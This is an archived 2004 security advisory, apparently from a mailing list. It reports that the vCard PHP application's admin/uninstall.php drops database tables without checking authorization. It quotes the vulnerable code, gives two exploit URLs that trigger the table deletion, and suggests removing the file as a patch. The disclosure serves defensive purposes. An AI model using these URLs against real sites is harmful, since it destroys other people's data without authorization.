The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Vcard 2.8 uninstall script problem


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 17 Mar 2004 22:21:38 -0000
From: saudi linux <[email protected]>
To: [email protected]
Subject: Vcard 2.8 uninstall script problem



Informations :
°°°°°°°°°°°°°°
Procduct: Vcard
Version : 2.9 may other VER
Problems : File uninstall & delete the table

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/admin/uninstall.php :
------------------------------------------------------------------------
[...]

<?
$step = $HTTP_GET_VARS['step'];
if (empty($step))
{
    echo "<p><b>Are you sure, uninstall vCard database tables and them contents?</b></p>";
    echo "<p>Yes, I'm sure. <a href='$PHP_SELF?step=2'>Click here to continue --></a></p>";
}

if ($step == 2)
{
	include "./config.inc.php";
	include("./db_mysql.inc.php");
	include("./functions.inc.php");

	$DB_site = new DB_Sql_vc;
	$DB_site->server = $hostname;
	$DB_site->user = $dbUser;
	$DB_site->password = $dbPass;
	$DB_site->database = $dbName;
	$DB_site->connect();
	$dbPass = "";
	$DB_site->password = "";

	//*********************************************
	$DB_site->query("DROP TABLE IF EXISTS vcard_abook ");
	$DB_site->query("DROP TABLE IF EXISTS vcard_account ");
?>

As u can see the script does not Check User Authorization 

Exploit:
°°°°°°°°°°
http://&#091;target]/[Vcard folder]/admin/uninstall.php

or 

http://&#091;target]/[Vcard folder]/admin/uninstall.php?step=2

patch:
°°°°°°°°°°
remove uninstall.php and protect admin folder by .htaccess



Saudi Linux 
KSA o0 KSA 0o


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



ðÁÒÔΣÒÙ:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
èÏÓÔÉÎÇ:

úÁËÌÁÄËÉ ÎÁ ÓÁÊÔÅ
ðÒÏÓÌÅÄÉÔØ ÚÁ ÓÔÒÁÎÉÃÅÊ
Created 1996-2024 by Maxim Chirkov
äÏÂÁ×ÉÔØ, ðÏÄÄÅÒÖÁÔØ, ÷ÅÂÍÁÓÔÅÒÕ